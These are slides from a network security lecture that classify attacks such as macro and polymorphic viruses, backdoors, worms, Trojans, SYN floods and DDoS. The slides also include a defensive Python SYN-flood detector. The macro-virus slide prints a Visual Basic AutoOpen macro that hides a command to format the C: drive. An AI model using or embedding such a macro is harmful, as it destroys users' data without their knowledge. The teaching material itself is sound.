Network Security: Presented By: Dr. Munam Ali Shah
Lecture 5
security attacks
To identify and classify which security attacks leads to
An Example of Boot Sector Virus
Polymorphic Virus
Virus that has the ability to “change” its own code to
avoid detection by signature scanners
Macro Virus
Is based on a macro programming language of a
popular application (e.g. MS Word/Excel, etc.)
Stealth Virus
Virus that has the ability to hide its presence from the
user. The virus may maintain a copy of the original,
uninfected data and monitor system activity
Example of Macro Virus
Visual Basic Macro to reformat hard drive
Sub AutoOpen()
    Dim oFS
    Set oFS = CreateObject(’’Scripting.FileSystemObject’’)
    vs = Shell(’’c:command.com /k format c:’’,vbHide)
End Sub
Trap Door
Trap doors, also referred to as backdoors, are
bits of code embedded in programs by the
programmer(s) to quickly gain access at a later
time.
If a programmer purposely leaves this code in
or simply forgets to remove it, a potential security
hole is introduced. Hackers often plant a backdoor
on previously compromised systems to gain later
access.
Worms
A Worm is a piece of software that uses computer
networks (and security flaws) to create copies of itself
First Worm in 1988: “Internet Worm“
propagated via exploitation of several BSD and sendmail bugs
infected large number of computers on the Internet
Some “successful“ Worms
Code Red in 2001
Infected hundreds of thousands of systems by exploiting a vulnerability in
Microsoft's Internet Information Server
Blaster in 2003
Infected hundreds of thousands of systems by exploiting a vulnerability in
Microsoft's RPC service
Trojan Horse
Trojan Horses
A Trojan is a non-self-replicating program that appears to
perform a desirable function for the user but instead facilitates
unauthorized access to the user's computer system
It is embedded within or disguised as legitimate software
Trojans may look interesting to the unsuspecting user, but are
harmful when actually executed
Two types of Trojan Horses
Useful software that has been corrupted by an attacker to
execute malicious code when the program is run
Standalone program that masquerades as something else
(like a game, or a neat little utility) to trick the user into
running it
Trojan Horses do not operate autonomously
Types of Trojan Horses (1/2)
Data-Sending Trojans
Are used by attackers to gather certain data
Passwords
E-banking credentials
Gathered data is often transferred to a location on the
Internet where the attacker can harvest the data later
on
Destructive Trojans
Trojans that perform directly harmful activity
Altering data
Encrypting files
Phishing
Denial of Service (DoS) Attacks
Categories of Denial of Service Attacks
Attack is launched   Stopping services            Exhausting resources
Locally              - Process killing            - Forking process to fill process table
                     - System reconfiguring       - Filling up the file system
Remotely             - Malfunction packet attack  - Packet flood (e.g. SYN flood, Smurf)
DoS: Stopping Services (locally)
DoS: Exhausting Resources (Locally)
DoS: Exhausting Resources (Remotely)
An attacker tries to tie up all resources of the
target system (particularly the communications
link)
Popular example: SYN-Flood
During a SYN-Flood an attacker will send a lot of SYN
packets with a spoofed (and unresponsive) source
address to the target and never complete the
handshake to fill up the connection queue or the
communication link (and cause a DoS)
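The SYN-Flood pattern described above can be recognised from the defender's side by tracking how many handshakes stay half-open. The following is an added example, not part of the original lecture; the function names, the thresholds (backlog of 128, 50% completion ratio) and the sample capture are assumptions made for illustration.

```python
from collections import defaultdict

def handshake_stats(packets, timeout=30.0):
    """Per (server, port): SYNs seen, handshakes completed, peak half-open count."""
    pending = {}  # (client, cport, server, sport) -> time the SYN was seen
    stats = defaultdict(lambda: {"syn": 0, "completed": 0, "peak_half_open": 0})
    for ts, src, sport, dst, dport, flags in sorted(packets):
        # Expire half-open entries the server would have given up on by now.
        for key in [k for k, t0 in pending.items() if ts - t0 > timeout]:
            del pending[key]
        if flags == "SYN":
            pending[(src, sport, dst, dport)] = ts
            entry = stats[(dst, dport)]
            entry["syn"] += 1
            outstanding = sum(1 for k in pending if k[2:] == (dst, dport))
            entry["peak_half_open"] = max(entry["peak_half_open"], outstanding)
        elif flags == "ACK" and pending.pop((src, sport, dst, dport), None) is not None:
            stats[(dst, dport)]["completed"] += 1  # client finished the handshake
    return dict(stats)

def flag_syn_floods(packets, backlog=128, min_completion=0.5):
    """Services whose half-open peak reaches the backlog while few handshakes finish."""
    flagged = []
    for service, s in handshake_stats(packets).items():
        if s["peak_half_open"] >= backlog and s["completed"] / s["syn"] < min_completion:
            flagged.append(service)
    return sorted(flagged)

# Constructed sample capture (documentation address ranges), client-to-server packets only.
SAMPLE = []
for i in range(5):  # five normal clients that complete the handshake
    SAMPLE.append((i + 0.00, "192.0.2.7", 40000 + i, "198.51.100.10", 443, "SYN"))
    SAMPLE.append((i + 0.05, "192.0.2.7", 40000 + i, "198.51.100.10", 443, "ACK"))
for i in range(200):  # 200 SYNs from varying sources, never followed by an ACK
    SAMPLE.append((10 + i * 0.01, f"203.0.113.{i % 250 + 1}", 1024 + i, "198.51.100.10", 80, "SYN"))

if __name__ == "__main__":
    for service, s in sorted(handshake_stats(SAMPLE).items()):
        print(service, s)
    print("flagged:", flag_syn_floods(SAMPLE))
```

Because the source addresses are spoofed, the per-service half-open count is the useful signal here; counting SYNs per source address would miss it.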
DDoS
DDoS attack terminology
Attacking machines are called daemons, slaves,
zombies or agents.
“Zombies” are usually poorly secured machines that
are exploited (Also called agents)
Machines that control and command the zombies are
called masters or handlers.
The attacker would like to hide his traces: he hides himself
behind machines that are called stepping stones.
Great Programming Required?
Remember!!
The hackers and attackers are expert-level
programmers
They know most of the programming concepts
They simply find the loopholes in the system and exploit
the opportunity to break into the system.
To become resilient against threats and to know the
programming level of attackers, and to determine the
bug,
YES great programming is required.
Summary of today’s lecture
In today’s lecture, we discussed in detail the different
types of security attacks that a computer system is/can
be vulnerable to.
Our discussion included some famous attacks such as
viruses, worms, DoS, Trojan horses etc.
Next lecture topics
We will continue our discussion of DoS attacks.
We will see how DoS attacks can cost millions of $$$$ to
a company
We will explore more types and sub-types of DoS
attacks.
The End